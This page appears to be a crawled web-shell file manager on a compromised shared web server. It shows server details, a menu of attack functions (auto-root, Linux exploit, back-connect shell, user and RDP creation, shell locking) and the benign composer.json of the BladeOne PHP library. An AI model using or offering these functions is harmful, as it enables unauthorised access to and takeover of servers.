Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
eftec /
bladeone /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
.php_cs
257
B
-rw-r--r--
BladeOneCache.md
1.79
KB
-rw-r--r--
BladeOneHtml.md
3.52
KB
-rw-r--r--
BladeOneLang.md
2.06
KB
-rw-r--r--
BladeOneLogic.md
337
B
-rw-r--r--
LICENSE
1.1
KB
-rw-r--r--
README.md
18.19
KB
-rw-r--r--
composer.json
1.17
KB
-rw-r--r--
phpcs.xml
657
B
-rw-r--r--
readme.template.md
1.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "eftec/bladeone", "description": "The standalone version Blade Template Engine from Laravel in a single php file", "type": "library", "keywords": [ "blade", "template", "view", "php", "templating" ], "homepage": "https://github.com/EFTEC/BladeOne", "license": "MIT", "authors": [ { "name": "Jorge Patricio Castro Castillo", "email": "jcastro@eftec.cl" } ], "config": { "platform": { "php": "5.6.1" } }, "require": { "php": ">=5.6", "ext-json": "*" }, "suggest": { "ext-mbstring": "This extension is used if it's active", "eftec/bladeonehtml": "Extension to create forms" }, "archive": { "exclude": [ "/examples" ] }, "autoload": { "psr-4": { "eftec\\bladeone\\": "lib/" } }, "autoload-dev": { "psr-4": { "eftec\\tests\\": "tests/" } }, "require-dev": { "phpunit/phpunit": "^5.7", "squizlabs/php_codesniffer": "^3.5.4", "friendsofphp/php-cs-fixer": "^2.16.1" }, "scripts": { "sniff": [ "phpcs --extensions=php ." ], "fix": [ "php-cs-fixer fix", "phpcbf --extensions=php ." ] } }
Close